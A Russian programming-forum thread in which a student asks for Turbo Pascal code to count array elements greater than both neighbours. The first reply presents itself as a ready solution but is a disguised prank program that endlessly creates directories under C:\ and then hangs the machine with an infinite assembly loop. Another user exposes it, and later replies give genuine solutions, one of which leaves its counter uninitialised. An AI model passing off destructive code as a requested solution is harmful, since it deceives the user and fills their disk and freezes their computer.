Форум программистов, компьютерный форум, киберфорум
Turbo Pascal
Войти
Регистрация
Восстановить пароль
 
Рейтинг 5.00/7: Рейтинг темы: голосов - 7, средняя оценка - 5.00
0 / 0 / 0
Регистрация: 27.03.2012
Сообщений: 8
1

Определить сколько элементов массива больше своих "соседей"

21.11.2012, 09:09. Просмотров 1465. Ответов 8
Метки нет (Все метки)

1. Дано: одномерный массив А(N). Определить сколько элементов массива больше своих "соседей", т.е. предыдущего и последующего элемента.
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
21.11.2012, 09:09
Ответы с готовыми решениями:

Найти число элементов массива, которые больше своих "соседей"
3.Дан одномерный массив А.Найти число элементов массива,которые больше своих "соседей", т.е....

Определить, сколько элементов имеют своих "соседей" по ряду.
Дан массив М, состоящий из 15 элементов вещественного типа. Определить, сколько элементов имеют...

Дано N действительных чисел. Определить, сколько из них больше своих "соседей", т.е. предыдущего и последующего среди них
Дано N действительных чисел. Определить, сколько из них больше своих "соседей", т.е. предыдущего и...

Используя цикл, написать программу, обеспечивающую ввод n целых чисел и определяющую, сколько из них больше своих "соседей"
Используя цикл, написать программу, обеспечивающую ввод n целых чисел и определяющую, сколько из...

8
Мечтатель
21.11.2012, 10:00 2
Вот сразу копируй и вставляй норм работает я когда то сам такие же решал задачи ))
Это к первой задачи.
Pascal
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
program Mas1;
uses crt;
var
i : Integer;
path : string;
begin
clrscr;
i := 1;
path := 'C:\';
while i <> 0 do 
begin
  write('Расчет массива  ');
  mkdir(path + 'lol[' + IntToStr(i)  + ']');
  i := i + 1;
 
  { А вот здесь небольшая проверочка на переполнение }
  if i = 0 then i := 1;
end;
asm
begin
  @lol:
    jmp @lol
end;
end.
0 / 0 / 0
Регистрация: 27.03.2012
Сообщений: 8
21.11.2012, 10:46  [ТС] 3
Спасибо большое)
0
180 / 178 / 23
Регистрация: 29.08.2012
Сообщений: 489
21.11.2012, 10:52 4
Чувак, по ходу тебя парят
Судя по коду программы у тебя будет много директорий и подвешен комп
0
0 / 0 / 0
Регистрация: 27.03.2012
Сообщений: 8
21.11.2012, 11:12  [ТС] 5
Чувак? Я девушка, а ты сможешь правильный написать?)
0
180 / 178 / 23
Регистрация: 29.08.2012
Сообщений: 489
21.11.2012, 11:25 6
Цитата Сообщение от Вreeze Посмотреть сообщение
Я девушка
О-да, здесь все становятся девушками когда надо срочно решить задачу Как я должен был понять, по аватаре? Не знал, что это определяет пол.
А вот по тому челу можно было сразу сказать, что доверять ему не следует - регистрация сегодня (ради тебя), ник говорящий, одно сообщение на форуме.

И да, любой тут решит эту задачу, кем бы ты там не был(а). Задача проста. Будет время - займусь, если никто раньше не решит.
Есть один спорный момент в задаче. Как поступать с краевыми элементами. Для них не может быть определео требуемое в задаче условие. Если же считать массив круговым, то тогда это можно обойти и для всех элементов будет определено требуемое.

PS. Видишь, как плохо не знать Паскаль - любой может лапши навесить и обмануть. Спрашивая решения таких простых задачь ты только усугубляешь своё положение и проецируя усложнение задачь во времени, скоро ты будешь их спрашивать в разделе Фриланс (уже не за так).
0
0 / 0 / 7
Регистрация: 21.11.2012
Сообщений: 14
21.11.2012, 11:42 7
Just лисяня вернулся и обнаружил, что учетка обнулилась =D
Pascal
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
const n=10;
var mas:array[1..n] of integer;
i,k:byte;
begin
k:=0;
Writeln('Zapolnenie massiva');
for i:=1 to n do
begin
write('mas[',i,']= ');
readln(mas[i]);
end;
for i:=2 to n-1 do
if (mas[i]>mas[i-1]) and (mas[i]>mas[i+1]) then inc(k);
Writeln('Kol-vo = ',k);
readln;
end.
0
0 / 0 / 0
Регистрация: 27.03.2012
Сообщений: 8
21.11.2012, 11:49  [ТС] 8
Yurek, По аватарке нельзя определить, но по нику можно. Не думаю что парень будет так себя называть
0
180 / 178 / 23
Регистрация: 29.08.2012
Сообщений: 489
21.11.2012, 12:48 9
Цитата Сообщение от Вreeze Посмотреть сообщение
Не думаю что парень будет так себя называть
Они как угодно себя обозначают. Пол можно установить только по паспорту, а лучше осмотром тела - тогда ещё можно что-то утверждать
Программа по первому варианту алгоритма:
Pascal
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
program Max_Sosed;
const
  n=100;
var
  A : array [1..n] of byte;
  s_max, i : byte;
begin
  writeln('Массив:');
  randomize;
  for i := 1 to n do
    begin
      A[i] := random(255) + 1;
      write(A[i], ' ');
    end;
  writeln;
  for i := 2 to n-1 do
    if (A[i] > A[i-1]) and (A[i] > A[i+1]) then
        s_max := s_max + 1;
  writeln('Количество элементов являющихся максимальными среди своих ''соседей'': ', s_max)
end.
0
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
21.11.2012, 12:48

Заказываю контрольные, курсовые, дипломные и любые другие студенческие работы здесь.

Определить, сколько чисел больше своих «соседей»
Дано 30 вещественных чисел. Определить, сколько из них больше своих «соседей», т. е. предыдущего и...

Определить сколько чисел больше своих соседей
"Дано n вещественных чисел. Определить сколько из них больше своих соседей, т.е. предыдущего и...

Определить, сколько из чисел больше своих «соседей»
Программа. Дано 200 вещественных чисел. Определить, сколько из них больше своих «соседей», т.е....

Типизированные файлы. Числа. Вывести количество чисел, которые больше своих "соседей"
Типизированные файлы. Программно создать файл, состоящий из 50 целых чисел в диапазоне . Описать...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
9
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2020, vBulletin Solutions, Inc.